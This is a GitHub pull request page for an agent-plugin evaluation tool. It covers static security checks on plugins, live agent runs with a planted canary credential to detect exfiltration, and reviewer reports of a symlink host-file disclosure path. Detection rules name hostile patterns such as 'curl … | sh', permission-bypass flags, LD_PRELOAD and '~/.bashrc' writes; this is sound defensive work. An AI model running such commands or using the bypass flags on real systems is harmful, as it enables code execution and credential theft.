Skip to content

feat(plugin): Add Plugin evaluation support across all tiers - #28

Open
chrisknvidia wants to merge 90 commits into
mainfrom
naren/plugin-evaluation-all-tiers
Open

chrisknvidia wants to merge 90 commits into
mainfrom
naren/plugin-evaluation-all-tiers

Conversation

@chrisknvidia

@chrisknvidia chrisknvidia commented Aug 1, 2026 •

Copy link
Copy Markdown
Collaborator

Summary

This PR adds plugin evaluation to every tier of SkillEvaluator. It takes a plugin in any of five manifest formats (agent_plugin.yaml, Claude Code, Codex, Cursor or Agent Plugins v1), checks its structure and security statically (Tier 1), checks it for duplication (Tier 2), and measures its behavior with live agents (Tier 3), loading it through a generated wrapper skill or natively in Claude Code, Codex and OpenCode. The reports say plainly what was and was not demonstrated.

Files staged ≠ components loaded ≠ behavior verified. Every plugin report separates what was inventoried, what was staged into a run, what the harness reported as loaded, what was observed in agent traces, and what was not evaluated at all. Missing evidence narrows the claim; it is never silently dropped.

Full documentation: docs/plugin-evaluation.mdx.

How plugin evaluation works

flowchart LR
    P["Plugin<br/>agent_plugin.yaml · Claude Code · Codex · Cursor · Agent Plugins v1<br/>skills · rules · MCP · hooks · agents · commands ·<br/>LSP · monitors · settings · styles"]

    subgraph T1["Tier 1 · Static & security (gating)"]
        direction TB
        T1a["Manifest checks per format<br/>+ component inventory"]
        T1b["Dependency classification<br/>provided / referenced / missing / external / unresolved"]
        T1c["MCP policy · pinning · endpoints<br/>(opt-in DNS and redirect checks)"]
        T1d["Hook risk · agent, command and skill privileges<br/>LSP, monitor and settings checks"]
        T1e["Whole-tree scans · bundled-skill quality/lint/version<br/>opt-in CVE audit: Python, npm, containers"]
        T1f["Static context-cost estimate"]
    end

    subgraph T2["Tier 2 · Deduplication (advisory)"]
        direction TB
        T2a["A · duplicate refs"]
        T2b["C-intra · bundled-skill overlap"]
        T2c["C-inter · skills vs local catalog"]
        T2d["B · plugin vs other plugins<br/>(optional LLM verdict)"]
    end

    subgraph T3["Tier 3 · Live agent evaluation (Harbor)"]
        direction TB
        L["Plugin loading<br/>wrapper (default): generated skill + members + rules + MCP<br/>native: claude-code · codex · opencode adapters"]
        A1["With plugin<br/>load census · hook census"]
        A2["Without plugin"]
        A3["Member skills only<br/>(sum of parts)"]
        G["Graders<br/>security incl. canary exfiltration · execution ·<br/>judges (N/A without a reference)"]
        S["Plugin signals (advisory)<br/>activations · routing · tool selection · arguments ·<br/>MCP outcomes · order · handoff · conflict"]
        M["MCP proof (opt-in)<br/>host probe + in-agent calls"]
        ST["Statistics<br/>paired bootstrap CI · pass@k / pass^k ·<br/>cost per success · token efficiency · context delta"]
    end

    R["Reports<br/>JSON · Markdown · HTML · SARIF · CLI<br/>coverage: staged / loaded / exercised<br/>INCOMPLETE / INCONCLUSIVE · plugin BENCHMARK.md"]

    P --> T1 --> T2 --> T3 --> R
    L --> A1
    A1 --> G
    A2 --> G
    A3 --> G
    G --> S --> ST
    S --> M
Loading

What each tier supports

Tier Capability Gating
1 Manifests: agent_plugin.yaml and the Claude Code, Agent Plugins v1, Codex and Cursor plugin.json formats, selected in that order, with root-bounded, no-follow discovery and each client's field checks. Other manifests found are recorded and their components checked. Opt-in claude-validate compares the verdict with claude plugin validate for Claude Code plugins (advisory) Blocking on invalid or unsafe input; MEDIUM plugin_manifest_conflict on a name or version mismatch
1 Component inventory: skills, rules, MCP, hooks (frontmatter hooks too), subagents, commands, LSP, output styles, monitors, settings, Codex apps and Agent Plugins extensions, each with a support level and per-component finding counts Missing, escaping, unsafe or invalid declared paths block (HIGH)
1 Dependency classification: provided / referenced / missing / external / unresolved, with fail-closed repository identity and validate --repo-root. Claude Code dependencies resolve against the plugin's marketplace.json Only missing blocks (HIGH plugin_dependency_missing); refs it cannot check are MEDIUM
1 MCP static policy for every mcpServers form (inline, path, array, root .mcp.json), read with each client's ${VAR} expansion CRITICAL and HIGH block; Tier 3 staging re-checks them
1 Pinning of package runners and images (npx, uvx, pnpm dlx, docker run, ...) through launch wrappers, in MCP servers and command hooks, with a pinning ratio HIGH mcp_command_floating_version for a moving tag; MEDIUM mcp_unpinned_package otherwise
1 Bypass flags and overrides in MCP servers, hooks, LSP servers, monitors and settings (--dangerously-skip-permissions, bypassPermissions, Codex -a never, auto-approve, LD_PRELOAD, proxy and base-URL redirects, shipped .env) HIGH or MEDIUM, by type
1 Endpoint policy for metadata, private, loopback and link-local hosts (encoded IPs too), with an mcp.allowed_private_hosts allowlist. Opt-in --resolve-endpoints adds DNS and one HEAD check HIGH (metadata, never allowlisted) or MEDIUM
1 Hook risk per handler, scripts included: remote code (curl … | sh, download-then-run), inline secrets, broad auto-approval, HTTP endpoints (hooks.allowed_urls), context injection CRITICAL to LOW; an unanalyzable script is HIGH
1 Subagent, command and skill privileges (tools, allowed-tools, permissionMode) HIGH: bypassPermissions, or allowed-tools that pre-approve any Bash. MEDIUM: wildcards, acceptEdits/auto, subagents that inherit every tool beside a write-capable MCP server. LOW: a subagent's unrestricted Bash
1 Whole-plugin-tree security, PII, code-risk, secrets, license, hygiene and Unicode scans, plus quality/lint/version on every bundled skill Existing Tier 1 gates
1 Opt-in dependency audit of declared exact pins, installing nothing: Python (pip-audit --no-deps --disable-pip), npm (lockfiles, package.json, MCP runner packages) and container images (MCP and Dockerfiles), with OSV-Scanner, npm audit, Grype or Trivy Advisory severity. Pins that pip-audit skips or the npm registry lacks are MEDIUM dependency-not-audited; floating versions are INFO; no scanner or an unreadable file is INCOMPLETE
1 Static always-on vs on-demand context-cost estimate, per harness and load mode Report-only
2 Check A (duplicate refs), C-intra (bundled-skill overlap), and the local-catalog checks C-inter (skills vs catalog) and B (plugin vs other plugins, optional --llm verdict). Catalog v2 stores plugin entries; v1 catalogs still load Advisory; unsafe input blocks
3 Three arms: with plugin, without plugin, member skills only. --lift-mode effectiveness|integration|both, with the Integration evidence gate (cross_component, expected_skills) Gates only with --block-on-agent-eval
3 --plugin-load wrapper|native|auto (default wrapper) for the with-plugin arm only: native adapters for claude-code (--plugin-dir), codex and opencode; Hermes (experimental) uses the wrapper. A per-trial load census lists staged components; Claude Code's init event marks them loaded or not_loaded Report-only. native refuses components with a permission bypass; a native run with no load census, or whose plugin Claude Code never loaded, is INCOMPLETE
3 Hook census: native command hooks run through hook_census.sh, which records runs, denials and start failures and passes input, output and exit code through Advisory; marks hooks exercised
3 Opt-in --trial-retries N (or harbor.trial_retries in evals/config.yml, 0–5): reruns a trial only when it fails before the agent starts its task (environment start timeout, agent setup timeout, or a network failure while installing the agent). A failure during the task is never retried; retries are shown in the run plan and counted in the results Report-only
3 Canary exfiltration: a random decoy credential (file and env var) in every arm, traced through shell statements, network and MCP tools, URLs, git, and files written outside the workspace Critical canary_exfiltration; plugin-attributable when the plugin arm leaks more often than the baseline
3 Runtime security: credential-store reads and protected-file writes, matched as normalized whole paths, subagent and child-agent calls included Critical scores 0.0
3 MCP proof (opt-in --probe-mcp): a policy-checked host initialize and tools/list for URL servers, with no host credentials unless a variable is named with --probe-mcp-env, then updated from the agent's own calls Advisory
3 Paired case-bootstrap 95% CI on Effectiveness and Integration lift, with a precision flag. pass^k, cost per success, token efficiency, measured first-turn context delta Report-only; Integration becomes INCONCLUSIVE when the CI crosses a ±0.05 band edge, fewer than 5 cases pair, or coverage is incomplete
3 Plugin signals (dataset-driven): activations, routing and tool-selection P/R/F1 with decoys, argument checks, MCP call outcomes by server and tool, order, handoff, conflict probes, activation coverage. Subagent calls are credited whichever key names the agent (subagent_type or Claude Code's type), and a successful Claude Code LSP call is credited to the plugin LSP server that serves the file's extension Advisory, report-only
3 Judges without a reference (ground_truth / expected_behavior) are N/A, not a fabricated 1.0 See reviewer notes
All Reports: plugin sections in JSON, Markdown, HTML, SARIF and the CLI, including plugin loading, hook census, canary and MCP proof. Tier 3 coverage per component (staged, loaded, not_loaded, exercised, ...), headlined as "N components not staged"; explicit INCOMPLETE and INCONCLUSIVE; plugin_provenance.json re-read when a report is rebuilt; plugin BENCHMARK.md card —

Reviewer notes: behavior changes to be aware of

  • N/A judges. Accuracy, goal accuracy and behavior check no longer return 1.0 when the case has no reference. They are excluded from the overall score and from lift, so a run where no case has ground_truth now gets a NEUTRAL verdict at best, because its Correctness evidence is missing. reward.json stays numeric-only for Harbor, and the N/A markers travel in the sidecar.
  • One lift basis, skills included. The arm without the skill or plugin scores skill_execution and skill_efficiency as N/A, and every lift compares its two arms case by case on the dimensions both scored. Activation alone no longer earns lift, so Skill Lift values change for skill runs too.
  • Tier 3 gate. With --block-on-agent-eval, a Tier 3 FAIL verdict now fails validate, and so does a confirmed Skill Lift regression (lift at or below −0.10 with its whole interval below zero). NEUTRAL never does.
  • Scores can move for skill runs too. Judges see the full body of each file write, within the evidence budget, instead of its first 200 characters. Runtime security checks more credential stores, protected files and subagent calls, and treats curl … | sh and forced git push as critical.
  • New blocking Tier 1 findings for plugins: the CRITICAL and HIGH findings of the manifest, component-path, dependency, MCP, endpoint, bypass-flag, hook-risk and privilege checks above. Tier 3 staging fails closed on the same MCP findings.
  • Bundled skills are gated. Quality, lint and version now run on each bundled skill, so a weak bundled skill can fail a plugin that used to pass.
  • Integration verdict (advisory). It reads the whole interval against the ±0.05 band and is inconclusive when the interval crosses a band edge, fewer than 5 cases pair, or per-case coverage is incomplete. The point estimate's band is kept as point_verdict.
  • The dependency audit no longer installs anything. It audits exact pins with --no-deps --disable-pip, so transitive coverage from requirements files is traded for not executing untrusted build code. Python advisories take their severity from the public OSV record (GitHub severity, then CVSS) rather than defaulting to HIGH.

Public adaptations and exclusions

  • Public GitHub/Git references and same-repository offline resolution only. Nothing internal is included: no GitLab, P4, managed execution, private providers or endpoints, credentials, telemetry, provider-registry MCP resolution, or remote vector DB.
  • Tier 1 plugin checks run offline unless you opt in: --resolve-endpoints adds DNS and redirect checks, and the dependency audit uses its scanners' advisory and registry lookups. Tier 2 catalogs are local files.
  • Not yet supported, and reported as such rather than hidden:
    • LSP servers outside native Claude Code, and monitors: native Claude Code stages LSP servers and credits them as exercised from the agent's LSP calls; other harnesses and wrapper mode do not stage them, and monitors are never staged;
    • native-load confirmation outside Claude Code: Codex and OpenCode components stay listed (found, not confirmed by the harness); Hermes has no native plugin path, and no end-to-end Hermes plugin run has been verified;
    • process-level evidence: runtime security and the canary read the agent's tool calls and the files they wrote, so a hook or MCP server process acting on its own is not observed;
    • an equivalent of internal's provider-registry MCP proof: provider-only MCP servers are never resolved or probed (the run is INCOMPLETE), and --probe-mcp covers URL servers only;
    • MCP env, headers and ${user_config.*} values that the with-plugin arm cannot apply (only native Claude Code applies them); such runs are INCOMPLETE;
    • Codex apps and Agent Plugins extensions, which are inventoried only.

Included pull requests

  • #171 (Stage C): native plugin loading, the Codex, Cursor and Agent Plugins v1 manifests, static risk checks for hooks, privileges, LSP, monitors, settings and output styles, runtime evidence (load and hook census, canary), npm and container CVE audits, and the MCP proof.
  • #180 and #181: fixes from two rounds of code review of this PR.
  • Fixes from live validation on real plugins and on a fixture plugin with every component type: MCP, hook, subagent, command and LSP staging, detection and reporting, NVIDIA Build bridge handling of long MCP tool names and non-text tool results, and --trial-retries (results).
  • The branch tracks main through v0.5.0, including the Harbor 0.24.0 upgrade from #83.

Verification

  • uv run pytest -q -n 6 at e8b7aeb: 17,893 passed, 29 skipped; CI green (17 checks). One existing timing test, test_streamed_timeout_callback_matches_result_and_contains_descendants, is flaky under heavy xdist load and passes on rerun
  • uv run ruff check .: passed
  • scripts/check_oss_boundary.py and scripts/ci/check_public_benchmarks.py --require-files tests/golden: passed
  • fern check: 0 errors

A sample live Harbor run on the internal counterpart of this work (MR !280) passed for Claude Code and Codex with native loading (results). Live plugin runs on Harbor 0.24.0 with NVIDIA Build (results):

  • Two real plugins loaded natively in Claude Code, Codex and OpenCode, and their bundled or referenced skills were exercised; Claude Code ran the plugin's hooks.
  • A fixture plugin with one of each component type, run natively in Claude Code, reached exercised for its MCP server, hooks, command and LSP server.
  • Some runs read INCOMPLETE because NVIDIA Build returned 429 to an agent or a judge; those trials are left unscored rather than given a score.

Verification also covers focused regressions per feature (including symlink, escape and oversize cases) and packaging and boundary checks.

Restoration note (from the original description)

This PR replaces #17, which GitHub permanently closed after the default-branch history was consolidated and the original head branch was deleted and recreated. The original discussion and commit history remain available on #17.

🤖 Generated with Claude Code

@rng1995
rng1995 force-pushed the naren/plugin-evaluation-all-tiers branch from 3a51f76 to a4a5e63 Compare August 4, 2026 19:14

@rng1995 rng1995 left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The plugin evaluation implementation and its follow-up hardening are well covered, but I found one small diff-hygiene issue to clean up.

Comment thread src/skillevaluator/utils/structured_data.py Outdated
rng1995
rng1995 previously approved these changes Aug 5, 2026

@rng1995 rng1995 left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Approved after the EOF diff-hygiene issue was fixed in 3965061, the review thread was resolved, and the complete GitHub check matrix passed.

@rng1995 rng1995 left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fresh review found two actionable security issues in the plugin evaluation staging path. The previous EOF-hygiene thread is already fixed and resolved. I will address these findings while updating the branch from current main.

Comment thread src/skillevaluator/tier3/plugin_eval.py Outdated
Comment thread src/skillevaluator/tier3/plugin_eval.py Outdated
rng1995
rng1995 previously approved these changes Aug 12, 2026

@rng1995 rng1995 left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Approved after fresh security review and remediation: all review threads are resolved, the branch is conflict-free against current main, the complete local suite passes (3,999 passed, 21 skipped, 3 deselected), and all 15 GitHub checks pass including Windows, packaging, DCO, and security scans.

@mohgupta-ship-it mohgupta-ship-it left a comment

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Posted by Codex on behalf of Mohit.

Request changes: plugin provenance is persisted through a symlink-following path after the long-running evaluation. This is a medium output-integrity risk for a same-privilege actor able to modify the selected results location. The inline note describes a no-follow, atomic remediation and the regression coverage needed.

Comment thread src/skillevaluator/tier3/plugin_eval.py Outdated

@mohgupta-ship-it mohgupta-ship-it left a comment

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Codex review on behalf of Mohit — REQUEST CHANGES

Critical sandbox/path-integrity blocker. Two safe reproductions show plugin-controlled Git symlinks can cause host-readable content to be staged before Docker isolation: (1) a member evals/evals.* symlink is accepted through find_eval_file(...).exists(), parsed, and copied into task inputs before any symlink validation; (2) a repo-root skills or rules symlink is resolved before containment, making the external target the trusted root.

This is a pre-sandbox host-file disclosure path, not only a race. Reject links/reparse points and mount crossings before resolution; use descriptor-anchored no-follow reads/copies for member datasets (new and legacy layouts); preserve the lexical clone-root boundary for canonical refs; and add regressions for both attack paths.

Secondary integrity issue: fail closed when the Git-origin slug is unavailable — the current fallback can mark a foreign reference as fully evaluated.

Comment thread src/skillevaluator/tier3/plugin_eval.py Outdated
Comment thread src/skillevaluator/tier3/plugin_eval.py Outdated
@rng1995

rng1995 commented Aug 31, 2026

Copy link
Copy Markdown
Collaborator

@chrisknvidia Gentle ping when you have a chance: there are still three unresolved review threads on this PR. Please take a look and update the branch or reply on the threads where you disagree.

@rng1995

rng1995 commented Sep 13, 2026

Copy link
Copy Markdown
Collaborator

Updated in f3aefb9: merged current main and resolved the conflicts, hardened provenance/canonical-ref/member-dataset staging, and fixed the custom-only sum-of-parts report path uncovered during the merge review. All addressed review threads are resolved. Local verification covered the full suite and focused security/report regressions; Ruff and git diff --check pass. All GitHub checks, including Python 3.12/3.13, DCO, CodeQL, packaging, Windows Tier 2, and macOS Tier 3, are green.

rng1995 added a commit that referenced this pull request Sep 30, 2026
…n-eval-stage-c

Resolve conflicts between PR #28's review fixes and Stage C: plugin_components.py keeps Stage C's hook-script reads (read_prefix via a shared _read_bytes helper that now takes the config budget flag), privilege and write-capable MCP helpers, and the inline {"mcpServers": {...}} wrapper, with #28's per-field item-cap findings, separate config read budget, and the >256 inline-map finding applied to the unwrapped map; plugin_sections.py combines #28's not-staged/not-observed coverage view with Stage C's loaded/exercised states (both count as staged; a row is unobserved only when neither its state nor its activation is exercised) and keeps one _PLUGIN_ARMS/_BASELINE_ARMS definition for the canary verdict and sum-of-parts labels; plugin_eval.py splits MCP servers from the normalized component manifest with #28's plugin_root check; runner.py passes the sum-of-parts alias proof and the canary kwargs to the sum-of-parts arm; cli.py escapes the integration skip reason alongside Stage C's MCP proof output; the Stage C coverage tests now expect the 'not staged' wording.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
chrisknvidia added a commit that referenced this pull request Oct 1, 2026
Add --plugin-load wrapper|native|auto (default wrapper, which keeps the
PR #28 behavior). Native Claude Code loads the plugin with --plugin-dir:
skills, rules, MCP servers including ${CLAUDE_PLUGIN_ROOT} launches,
hooks, agents, commands, output styles, LSP servers, settings and
userConfig. Codex, OpenCode and Hermes get their own config files, and
OpenCode subagents keep their tool limits. Only the with-plugin arm
changes.

A per-trial load census records what each harness listed or loaded. A
failed MCP server never counts as loaded, and declared components that
were not staged make the run INCOMPLETE. auto falls back to the wrapper
per agent and records why. Hermes is experimental and refused with the
OpenAI and OpenAI-compatible providers. Launch rewriting is linear-time.

Co-authored-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
chrisknvidia added a commit that referenced this pull request Oct 1, 2026
Add --plugin-load wrapper|native|auto (default wrapper, which keeps the
PR #28 behavior). Native Claude Code loads the plugin with --plugin-dir:
skills, rules, MCP servers including ${CLAUDE_PLUGIN_ROOT} launches,
hooks, agents, commands, output styles, LSP servers, settings and
userConfig. Codex, OpenCode and Hermes get their own config files, and
OpenCode subagents keep their tool limits. Only the with-plugin arm
changes.

A per-trial load census records what each harness listed or loaded. A
failed MCP server never counts as loaded, and declared components that
were not staged make the run INCOMPLETE. auto falls back to the wrapper
per agent and records why. Hermes is experimental and refused with the
OpenAI and OpenAI-compatible providers. Launch rewriting is linear-time.

Co-authored-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
rng1995 added a commit that referenced this pull request Oct 5, 2026
Bug fixes from the code-quality review of #28 and the follow-up review of #180, one signed-off commit per fix with a regression test.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
chrisknvidia added a commit that referenced this pull request Oct 6, 2026
PR #28 pinned Harbor 0.13.2. Its trajectory conversion drops data the
plugin checks read: Codex per-step tokens (check 25), Claude Code
subagent steps and their MCP calls (checks 18, 19, 22, 24, 28), and
parallel Codex calls in one step (check 18's same-step guard).

This commit carries PR #83's Harbor port (0.13.2 to 0.22, with its
conflicts against the plugin code resolved), then moves on to Harbor
0.24.0 and LiteLLM 1.92+. On top of the port:
- native Claude Code loading knows Harbor's new launch shape;
- Codex runs convert the main thread when the agent spawns a subagent,
  and fold child threads in as sidechain steps;
- the environment kwarg contract and native staging follow 0.24
  (cwsandbox owns the W&B backend; separate-verifier rule).

Fixes proof H4 and the Codex child-rollout part of L26.

Overlap with #180: both sides stopped oversized usage counters and
rewards from aborting collection (#180 b1c3410, 7608e96). The tree
keeps one finite_number() helper and the port's fail-closed reward
rule; the collector's private copy is gone.

This branch is cut per file. collector.py lands here whole, so it also
holds the security attribution (runtime security commit), codex.txt
call pairing (MCP execution), lift arms (lift) and usage (context cost)
hunks; adapter.py holds the agent HOME variables for the verifier;
runner.py holds the long plugin name and MCP input-schema hunks;
metrics.py holds a shared lift basis hunk. PR #83's hunks in
tier3_report.py and cli.py land with the lift and gate commits, and its
docs land in the docs commit.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Comment thread tests/validators/test_plugin_component_risk.py Fixed
rng1995 added a commit that referenced this pull request Oct 6, 2026
Bring #28's 19 new commits (Harbor 0.24.0, the Tier 3 collector and
plugin-signals rewrites, plugin evaluation fixes) into this branch and
resolve the 42 conflicting files.

Where both sides changed the same behaviour, #28's approach is kept
unless this branch covered a tested case it did not; this branch's
refactors are ported onto #28's code:
- validators: one MCP runner reader (parse_mcp_runner) covers #28's
  runner forms; URL credential rules live in url_policy, shared by MCP
  URLs, HTTP hooks and hook commands; #28's floating-version, shell -c,
  wrapper and credential rules are kept.
- plugin model: #28's repository-identity rule, with a remedy per
  cause; one agent-CLI flag walk that includes --allowedTools; the
  not-loaded state lives in plugin_states.
- verifier: eval.py and eval_core stay byte-identical; process
  substitution writes such as `tee >(cat) ~/.bashrc` are detected.
- Tier 3: one arm-collection pipeline carries #28's per-arm behaviour.
- reporting: one component index, one canary attribution rule, and
  per-agent Integration blocks in the result display.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
rng1995 added a commit that referenced this pull request Oct 6, 2026
Batch 2 of fixes from the code-quality review of #28 (remaining bugs, logic that had drifted apart, dead code, readability, performance), the fixes from the review of #181, and fixes to #28's newer code made while merging its head. One signed-off commit per fix, each bug fix with a regression test.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
@rng1995

rng1995 commented Oct 7, 2026 •

Copy link
Copy Markdown
Collaborator

Live evaluation results: plugin evaluation on real plugins

Result: plugin evaluation works end to end on two real plugins across Tier 1, Tier 2 and Tier 3. Native loading is confirmed for claude-code, codex and opencode. The live runs found 9 SkillEvaluator issues, all fixed and pushed to this PR (listed below; suite: 17,617 passed; gitleaks and the OSS boundary check are clean).

What was tested

Plugin Components
P1 (public) NVIDIA/skills → plugins/nvidia-skills .claude-plugin, .codex-plugin, .cursor-plugin; 1 bundled skill
P2 (internal bundle) A plugin from an internal catalog agent_plugin.yaml, .claude-plugin, .codex-plugin; 7 command hooks; 1 skill declared by a source: gitlab ref

Setup

  • Provider: NVIDIA Build (nemotron-3-super-120b-a12b), Docker env mode on macOS.
  • Tools: gitleaks 8.30.0, SkillSpector 2.12.0, and Claude Code 2.1.286 for parity.
  • Tier 3: 3 cases × 2 arms per run, --timeout-multiplier 3.

Results

Area Test P1 public P2 internal
Detection Manifest precedence, multi-manifest declarations, inventory, MCP ✅ ✅ (MEDIUM version conflict, as expected)
Dependency refs (source: gitlab, same-repo identity) n/a ✅ after fix
Tier 1 Schema and bundled-skill quality 🟣 HIGH author_format ✅ after fix
Hook risk model n/a 🟣 HIGH: hooks fall back to CODEX_PLUGIN_ROOT
Permissions, context cost, dependency audit, exit gate, --policy ✅ ✅
Whole-tree security scans ✅ after fix 🟣 SkillSpector itself reports partial
claude plugin validate parity ✅ n/a (agent_plugin.yaml selected)
Tier 2 Catalog build (61 plugins), tier2 --catalog, validate --tiers 1,2 ✅ ✅
Tier 3 opencode · wrapper · validate --tier3 --block-on-agent-eval ✅ 6/6 scored; 0.935 vs 0.768 (Δ +0.18) ✅ ref skill staged
opencode · native ✅ skill exercised ✅ skill exercised; hooks not_loaded (unsupported)
claude-code · native (Messages bridge) ✅ skill loaded (init event) and exercised; with-plugin 3/3, 0.81 ✅ skill loaded; 4/9 hook handlers ran, exit 0
codex · native (Responses bridge) ✅ skill exercised ✅ ref skill exercised; hooks not_loaded
Coverage vs census consistency ✅ ✅ after fix
Runtime security and canary ✅ security 1.0; no exfiltration ✅ no exfiltration
Reports JSON/HTML completeness, N/A shown as null/"n/a", BENCHMARK.md ✅ ✅
Key redaction (1,107 files incl. bridge logs) ✅ 0 hits ✅ 0 hits

Legend: ✅ pass · 🟣 correct finding about the plugin (not an SE bug).

Some Tier 3 runs scored 5 of 6 trials or fewer. The losses were outside SkillEvaluator: agent-install network failures on the test host, two 900 s agent timeouts, one judge reply that wasn't valid JSON, and the intermittent output-cap error listed under Remaining. In every case SE marked the run INCOMPLETE rather than inventing a score.

Fixes pushed to this PR

The branch history was later reorganized into logical commits; each fix links to the commit that now contains it.

Now in commit Fix
d428216e1 + 4d66cba65 fix(plugin): accept source: gitlab dependency refs
d428216e1 fix(plugin): one schema finding per bad dependency ref
6f2d54fd1 fix(plugin): resolve hook scripts named through root default chains and variables
11dadc0eb fix(security): exempt a manifest's declared author email from PII
11dadc0eb fix(security): reconcile SkillSpector's documented out-of-scope artifacts (upstream bug SKILLSPECT-224)
dde92270e fix(tier3): match ref-declared member skills to their runtime evidence
bca81c60f fix(tier3): explain command-output budget overflows in the limit error
eecd88731 fix(reporting): show Integration as not measured for effectiveness-only plugin runs
eecd88731 fix(reporting): show a passed result's warnings in the CLI report

Remaining

  • Hermes: not run live; it uses the wrapper.
  • Intermittent 16 MiB setup-output error: cause not confirmed. It occurred only under network contention, and the next occurrence will now record a redacted diagnostic.
  • Parity limitation: the check is skipped when agent_plugin.yaml is selected, even if the plugin also ships .claude-plugin/plugin.json.

Full SkillEvaluator reports

validate --type plugin --tiers 1,2,3 --tier3 -a opencode --plugin-load native --trial-retries 2 on head e8b7aeb.

Plugin BENCHMARK.md report.html
P1 (public) nvidia-skills BENCHMARK.md report.html
P2 (internal bundle) BENCHMARK.md report.html

🤖 Generated with Claude Code

rng1995 and others added 3 commits October 8, 2026 10:02
Consolidate the existing PR #28 changes for 8 paths.
Preserve final file contents and modes without editing source or tests.

The original history remains on backup/christopherk/pr28-before-squash-20261008.
Contributor sign-offs below are retained from the original commits;
Christopher's sign-off also certifies this unchanged regrouping.

Original-PR-base: f32c884
Original-PR-head: e90da1d
Source-group: 01/20
Source-commit-count: 69
Co-authored-by: Christopher Kevin <christopherk@nvidia.com>
Co-authored-by: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Signed-off-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Consolidate the existing PR #28 changes for 22 paths.
Preserve final file contents and modes without editing source or tests.

The original history remains on backup/christopherk/pr28-before-squash-20261008.
Contributor sign-offs below are retained from the original commits;
Christopher's sign-off also certifies this unchanged regrouping.

Original-PR-base: f32c884
Original-PR-head: e90da1d
Source-group: 02/20
Source-commit-count: 90
Co-authored-by: Claude Opus 5.5 <noreply@anthropic.com>
Co-authored-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
Co-authored-by: Narendran Raghavan <nraghavan@nvidia.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Signed-off-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Consolidate the existing PR #28 changes for 26 paths.
Preserve final file contents and modes without editing source or tests.

The original history remains on backup/christopherk/pr28-before-squash-20261008.
Contributor sign-offs below are retained from the original commits;
Christopher's sign-off also certifies this unchanged regrouping.

Original-PR-base: f32c884
Original-PR-head: e90da1d
Source-group: 03/20
Source-commit-count: 107
Co-authored-by: Claude Opus 5.5 <noreply@anthropic.com>
Co-authored-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
Co-authored-by: Narendran Raghavan <nraghavan@nvidia.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Signed-off-by: Narendran Raghavan <32655573+rng1995@users.noreply.github.com>
Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
chrisknvidia and others added 28 commits October 8, 2026 10:53
…still

paired_case_bootstrap() always drew 2,000 resamples. The expanded
percentile tail shrinks fast at small n (0.24% at 6 cases), so each
bound was about the 5th lowest or highest of 2,000 resampled means and
moved with the RNG seed: on a real 6-case run, seeds 0-19 gave ci_low
from +0.027 to +0.065 and ci_high from +0.455 to +0.504, around an exact
interval of [+0.037, +0.473].

The resample count is now a minimum. With 5 or more paired cases the
bootstrap draws enough resamples that each bound rests on 200 resampled
means (82,244 at 6 cases, about 8,000 for large runs), and reports the
count it used. Seeds 0-19 now stay within 0.005 of the exact interval.
With fewer cases the bounds are the extreme resampled means, which 2,000
resamples already reach, so those runs are unchanged.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopherk <christopherk@nvidia.com>
…xt cost

The measured context cost read only the arm's scored attempts. A trial
whose reward was set aside as unscoreable (a judge error, say) was dropped
before its trajectory was read, although the agent ran and its first-turn
prompt token count is intact. On a real 6-case run, one judge error cut
n_pairs from 6 to 5, called the run partial because a case "has a count in
one arm only", and never counted the dropped trials in `excluded`. The docs
say a judge error does not change a token count.

The collector now keeps one reward row per trial that has no scoreable row,
observes those trials' usage as the arm's `unscored` attempts, and the
context cost reads them next to the scored ones. Lift, pass^k, cost and
token efficiency still use the scored attempts only.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopherk <christopherk@nvidia.com>
The PII scan exempts a plugin manifest's declared author email on its
line by masking it with re.sub on the line text. In a minified manifest
such as {"contact":"xa@corp.com","author":{"email":"a@corp.com"}} the
first textual hit of "a@corp.com" is inside "xa@corp.com", so the scan
reported the exempt author address and never reported the real one.

The scan now matches the line as it is and drops one match that equals
the author email, so a different address that contains the same text
is still reported.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The email PII rule skips a whole line when the line contains any of its
exception words. One of them is "://", meant for URL userinfo such as
https://user:token@host. Because the test was on the whole line, any
line that also had a URL, such as a README sentence with a docs link or
a minified plugin.json with a homepage, never reported a real address.

